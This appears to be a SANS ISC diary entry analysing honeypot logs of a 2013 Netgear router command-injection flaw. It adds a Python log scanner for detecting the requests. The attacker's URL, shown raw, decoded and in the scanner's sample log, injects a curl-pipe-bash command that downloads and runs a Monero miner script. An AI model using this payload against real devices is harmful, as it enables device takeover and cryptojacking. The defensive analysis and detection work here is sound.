The Curious Case of a 12-Year-Old Netgear Router Vulnerability

    Published: 2025-01-15. Last Updated: 2025-01-15 08:25:56 UTC
    by Yee Ching Tok (Version: 1)

    Routers play an essential role in networking and are one of the key components that allow users to have internet connectivity. Vulnerabilities in routers could result in reduced speeds or the possibility of vulnerable equipment being compromised and turned into part of a botnet. While looking at the DShield weblogs, I noticed an interesting URL in the “First Seen” URLs page as follows:

    /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=curl+-s+-L+https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh+%7C+bash+-s+4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw

    As usual, let us make it more human-readable via Cyberchef’s URL Decode recipe or Burp Suite’s Decoder:

    /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw

    We can observe a few artifacts that appear banal at first but get pretty interesting after some thought and correlation of data. Firstly, the URL “/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=” is associated with a 12-year-old Netgear vulnerability that was first reported by Roberto Paleari [1, 2] in May 2013. The vulnerability, with a CVSS 3.1 score of 9.8, affects the Netgear DGN1000, firmware < 1.1.00.48 and Netgear DGN2000 v1 routers. Netgear no longer supports these routers [3], and the vulnerability is pretty serious since it allows authentication bypass and command injection. A check with DShield’s URL history (with reference to Figure 1, note that the searched URL is a subset of the First Seen URL) shows that it remains a favorite URL despite its relatively old age.


    Figure 1: URL History for URL Associated with Netgear Router Vulnerability (CVE-2024-12847)

    Another interesting observation (take a second look at Figure 1’s caption) is that this vulnerability was only formally registered in the CVE database in 2024, although it was first disclosed in May 2013; the corresponding CVE entry was published recently, on January 10, 2025 [4].

    Finally, let us discuss the elephant in the room. I am unsure why anyone would choose to install a cryptocurrency miner on a router that is around 16 years old (based on FCC database records of Netgear DGN1000 [5]). After careful examination of the associated FCC documents, the processor for the Netgear DGN1000 router was the Infineon AMAZON-SE PSB 50601 HL V1.2 chip. Official processor benchmarks for this chip were unavailable, but the processor would likely not be very performant in cryptocurrency mining. In any case, we can observe a Monero wallet address (4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw) being included as part of the URL being sent.
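    To turn the decoding and analysis above into something repeatable, here is a small Python scanner (an added example, not part of the diary or of any DShield tooling) that reads access-log lines, reproduces the URL-decode step, flags requests for /setup.cgi with todo=syscmd, and pulls out the injected command, the URLs it fetches, and the positional argument handed to the downloaded script (the wallet address in this case). The log lines are constructed for the example and reuse only the request seen in the diary.

```python
"""Flag web-log requests matching the Netgear setup.cgi 'syscmd' injection pattern."""
import re
import shlex
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (combined-log style). Only the first
# line carries the request pattern the diary discusses; the rest are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jan/2025:08:00:01 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=curl+-s+-L+https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh+%7C+bash+-s+4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw HTTP/1.1" 404 0
203.0.113.9 - - [15/Jan/2025:08:00:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [15/Jan/2025:08:00:03 +0000] "GET /setup.cgi?next_file=status.htm HTTP/1.1" 200 1024
"""

# client, two ident fields, [timestamp], "METHOD target PROTOCOL"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def decode_request(target: str) -> str:
    """The same human-readable form the Cyberchef/Burp URL Decode step produces."""
    return unquote_plus(target)

def parse_syscmd_request(target: str):
    """Return details of a setup.cgi command-injection request, or None if it is not one."""
    parts = urlsplit(target)
    if not parts.path.endswith("/setup.cgi"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)   # decodes '+' and %XX for us
    if qs.get("todo", [""])[0] != "syscmd":
        return None
    cmd = qs.get("cmd", [""])[0]
    info = {"next_file": qs.get("next_file", [""])[0], "cmd": cmd,
            "urls": re.findall(r"https?://\S+", cmd), "script_args": []}
    # Recover what is passed to the downloaded script, e.g. "... | bash -s <wallet>".
    try:
        tokens = shlex.split(cmd)
    except ValueError:            # unbalanced quotes in a malformed payload
        tokens = cmd.split()
    if "bash" in tokens:
        after_bash = tokens[tokens.index("bash") + 1:]
        info["script_args"] = [t for t in after_bash if not t.startswith("-")]
    return info

def scan_log(text: str):
    """Return one record per log line that carries the injection pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        info = parse_syscmd_request(m["target"])
        if info:
            hits.append({"ip": m["ip"], "ts": m["ts"], **info})
    return hits
```

On a real router or web-server log, a non-empty result from scan_log is the signal to block the source and check the device for the miner; the extracted script_args give you the wallet to add to your IoC list.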

    I want to think that it is unlikely that anyone is still using the affected Netgear routers due to age. However, the DShield weblogs show that it is still a popular attack vector (no doubt, as it bypasses authentication and allows command injection remotely). Since it is a day just after Microsoft’s Patch Tuesday, why not check on your routers and see if they are up to date and patched with the latest firmware provided by the manufacturer? If you’re visiting friends and family, checking on them and seeing if their routers are updated or require new ones could also be worthwhile. Better yet, as Johannes has suggested in a previous post [6], consider using an open-source router such as pfSense or OPNsense that can help improve your network visibility and cybersecurity posture.

    Indicators-of-Compromise (IoCs):
    4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw (Monero (XMR) Wallet Address)

    References:
    1. https://seclists.org/bugtraq/2013/Jun/8
    2. https://www.exploit-db.com/exploits/25978
    3. https://www.netgear.com/support/product/dgn1000/
    4. https://nvd.nist.gov/vuln/detail/CVE-2024-12847#VulnChangeHistorySection
    5. https://fccid.io/PY309300114
    6. https://isc.sans.edu/diary/Whats+the+deal+with+these+router+vulnerabilities/29288

    -----------
    Yee Ching Tok, Ph.D., ISC Handler